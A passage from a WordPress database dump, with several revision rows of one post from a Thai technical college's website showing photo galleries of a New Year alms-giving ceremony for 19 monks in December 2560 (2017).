/></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 15:51:01', '2018-01-06 08:51:01', '', 354, 'http://sim.technicrayong.ac.th/?p=363', 0, 'revision', '', 0),
(364, 1, '2018-01-06 15:51:52', '2018-01-06 08:51:52', '<p align=\"center\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n</p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 15:51:52', '2018-01-06 08:51:52', '', 354, 'http://sim.technicrayong.ac.th/?p=364', 0, 'revision', '', 0),
(365, 1, '2018-01-06 15:52:33', '2018-01-06 08:52:33', '<center>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n</center>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 15:52:33', '2018-01-06 08:52:33', '', 354, 'http://sim.technicrayong.ac.th/?p=365', 0, 'revision', '', 0),
(367, 1, '2018-01-06 16:01:55', '2018-01-06 09:01:55', '<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:01:55', '2018-01-06 09:01:55', '', 354, 'http://sim.technicrayong.ac.th/?p=367', 0, 'revision', '', 0),
(368, 1, '2018-01-06 16:05:07', '2018-01-06 09:05:07', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n</p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:05:07', '2018-01-06 09:05:07', '', 354, 'http://sim.technicrayong.ac.th/?p=368', 0, 'revision', '', 0),
(369, 1, '2018-01-06 16:06:03', '2018-01-06 09:06:03', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n</p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:06:03', '2018-01-06 09:06:03', '', 354, 'http://sim.technicrayong.ac.th/?p=369', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(370, 1, '2018-01-06 16:07:56', '2018-01-06 09:07:56', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:07:56', '2018-01-06 09:07:56', '', 354, 'http://sim.technicrayong.ac.th/?p=370', 0, 'revision', '', 0),
(371, 1, '2018-01-06 16:09:07', '2018-01-06 09:09:07', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:09:07', '2018-01-06 09:09:07', '', 354, 'http://sim.technicrayong.ac.th/?p=371', 0, 'revision', '', 0),
(372, 1, '2018-01-06 16:10:39', '2018-01-06 09:10:39', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:10:39', '2018-01-06 09:10:39', '', 354, 'http://sim.technicrayong.ac.th/?p=372', 0, 'revision', '', 0),
(373, 1, '2018-01-06 16:14:14', '2018-01-06 09:14:14', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img 